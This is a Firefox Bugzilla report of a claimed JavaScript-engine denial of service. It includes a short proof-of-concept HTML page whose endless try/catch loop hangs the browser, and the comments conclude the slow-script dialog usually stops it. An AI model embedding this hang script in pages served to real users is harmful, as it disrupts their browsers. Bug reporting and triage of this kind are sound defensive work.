1332563 - Denial Of Service via try and catch and encodeURI

Status: UNCONFIRMED

(Core :: JavaScript Engine, defect, P3)

Description

[Dhiraj Mishra]

User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Build ID: 20161208153507

Steps to reproduce:

I am using :
Name 	Firefox
Version 	50.1.0
Build ID 	20161208153507
User Agent 	Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
OS 	Windows_NT 6.1

Steps to Reproduce :
1. Visit http://hackies.in/force.html
2. Crash ID generates


Code :
<html><head><title></title>
<script type="text/javascript">
while (true) try {
                var object = { };
                function g(f0) {
                        var f0 = (object instanceof encodeURI)('foo');
                }
                g(75);
        } catch (g) { }
</script>
</head></html>


Crash ID :
https://crash-stats.mozilla.com/report/index/a265cc1e-e710-465a-8963-de4f72170120 

 


Actual results:

Its impossible to further click anywhere in the application window.

Works on all platform and various version as well.

Comment 1

[Daniel Veditz [:dveditz]]

This is a hang (and eventual kill) due to the infinite loop. Why didn't the "slow script" dialog give you a chance to kill it?

Comment 2

[giul.mus]

Works for me, after a few seconds the "slow script" dialog pops up and lets me kill the script.

Firefox 51.0.1 (64-bit)
UA: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
Build ID: 20170201174907
OS: Ubuntu 16.10

Comment 3

[Dhiraj Mishra]

WFM in Ubuntu gives popup slow script and kills the script but this happens sometimes probably FF become freeze to give stop script pop up.